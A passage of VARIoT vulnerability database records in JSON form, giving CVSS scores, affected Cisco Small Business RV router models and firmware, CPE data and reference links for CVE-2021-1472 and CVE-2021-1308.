                  baseScore: 9.8,
                  baseSeverity: "Critical",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2021-1472",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2021-1472",
                  trust: 1.8,
                  value: "CRITICAL",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2021-1472",
                  trust: 1,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202104-433",
                  trust: 0.6,
                  value: "CRITICAL",
               },
               {
                  author: "VULMON",
                  id: "CVE-2021-1472",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2021-1472",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory",
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1472",
         },
      ],
      trust: 1.71,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2021-1472",
            trust: 3.3,
         },
         {
            db: "PACKETSTORM",
            id: "162238",
            trust: 1.7,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
            trust: 0.8,
         },
         {
            db: "PACKETSTORM",
            id: "165799",
            trust: 0.6,
         },
         {
            db: "AUSCERT",
            id: "ESB-2021.1172",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2021-1472",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2021-1472",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   id: "VAR-202104-0893",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2024-02-13T01:43:20.924000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
            trust: 0.8,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-rv-bypass-inject-rbhgvfdx",
         },
         {
            title: "Cisco Small Business RV Series Routers Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=147015",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-sb-rv-bypass-inject-rbhgvfdx",
         },
         {
            title: "目录\nWindows生产力提升(linux化)\nburpsuite2021.5.1使用方法\nAcunetix Premium (AWVS)使用方法\n代理软件使用方法",
            trust: 0.1,
            url: "https://github.com/zmylml/yangzifun ",
         },
         {
            title: "Kenzer Templates [5170] [DEPRECATED]",
            trust: 0.1,
            url: "https://github.com/arpsyndicate/kenzer-templates ",
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2021-1472",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-287",
            trust: 1,
         },
         {
            problemtype: "Buffer error (CWE-119) [ Other ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-rv-bypass-inject-rbhgvfdx",
         },
         {
            trust: 1.8,
            url: "http://seclists.org/fulldisclosure/2021/apr/39",
         },
         {
            trust: 1.7,
            url: "http://packetstormsecurity.com/files/162238/cisco-rv-authentication-bypass-code-execution.html",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2021-1472",
         },
         {
            trust: 0.6,
            url: "https://packetstormsecurity.com/files/165799/cisco-small-business-rv-series-authentication-bypass-command-injection.html",
         },
         {
            trust: 0.6,
            url: "https://www.auscert.org.au/bulletins/esb-2021.1172",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/287.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
         {
            trust: 0.1,
            url: "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv_series_authbypass_and_rce/",
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2021-1472",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULMON",
            id: "CVE-2021-1472",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-04-08T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1472",
         },
         {
            date: "2021-12-10T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            date: "2021-04-07T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
         {
            date: "2021-04-08T04:15:13.687000",
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2023-11-07T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1472",
         },
         {
            date: "2021-12-10T09:10:00",
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            date: "2022-08-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
         {
            date: "2023-11-07T03:28:23.127000",
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Cisco Small Business RV  Buffer error vulnerability in series routers",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "authorization issue",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
      ],
      trust: 0.6,
   },
}

var-202104-0380
Vulnerability from variot

Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0380",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.0.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.20",
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "cisco rv132w adsl2+ wireless-n vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "cisco rv134w vdsl2 wireless-ac vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "link layer discovery protocol",
            scope: null,
            trust: 0.6,
            vendor: "cisco",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-35514",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005371",
         },
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv132w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv134w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.0.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1308",
         },
      ],
   },
   cve: "CVE-2021-1308",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "ADJACENT_NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 6.1,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 6.5,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Adjacent Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 6.1,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2021-1308",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "ADJACENT_NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
